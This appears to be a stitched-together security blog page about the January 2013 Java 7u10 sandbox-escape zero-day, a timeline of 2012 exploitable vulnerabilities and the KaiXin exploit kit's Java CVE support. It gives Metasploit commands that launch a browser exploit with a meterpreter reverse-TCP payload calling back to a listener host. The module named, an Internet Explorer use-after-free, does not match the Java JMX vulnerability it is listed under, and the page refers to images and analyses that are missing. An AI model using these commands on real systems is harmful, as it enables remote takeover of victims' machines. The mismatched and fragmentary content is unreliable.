Vulnerability discovered exploited in the wild by kafeine the 2013-01-10
Metasploit PoC provided the 2013-01-10
PoC provided by :
0 day 1.7u10 spotted in the Wild – Disable Java Plugin NOW !
Affected version(s) :
Oracle Java SE 7 Update 10 and bellow
Tested on Windows 8 Pro with :
Internet Explorer 10
Oracle Java SE 7 Update 10
This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in January of 2013. The vulnerability affects Java version 7u10 and earlier.
Commands : use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
You can find, by clicking on the following image, a visualization timeline of the main exploitable vulnerabilities of year 2012.
Start date of a slide is corresponding to:
the date of discovery of the vulnerability, or
the date of report to the vendor, or
the date of public release of the vulnerability
End date of a slide is corresponding to:
the date of vendor security alert notification, or
the date of Metasploit integration, or
the date of fix, or
the date of PoC disclosure
Year 2012 Main Exploitable Vulnerabilities Interactive Timeline
The August version of KaiXin was supporting:
November version of KaiXin has involve by removing support of Oracle Java CVE-2012-0507 and CVE-2012-0754 vulnerabilities, and adding support of Oracle Java (fixed in CVE-2012-1723 Jun 2012 CPU), of Oracle Java (fixed in CVE-2012-4681 End August Oracle Security Alert) and of Oracle Java (fixed in CVE-2012-5076 October 2012 CPU).
Here under a VirusTotal analysis of all involved files:
The following diagram describe you the way November version of KaiXin EK is working.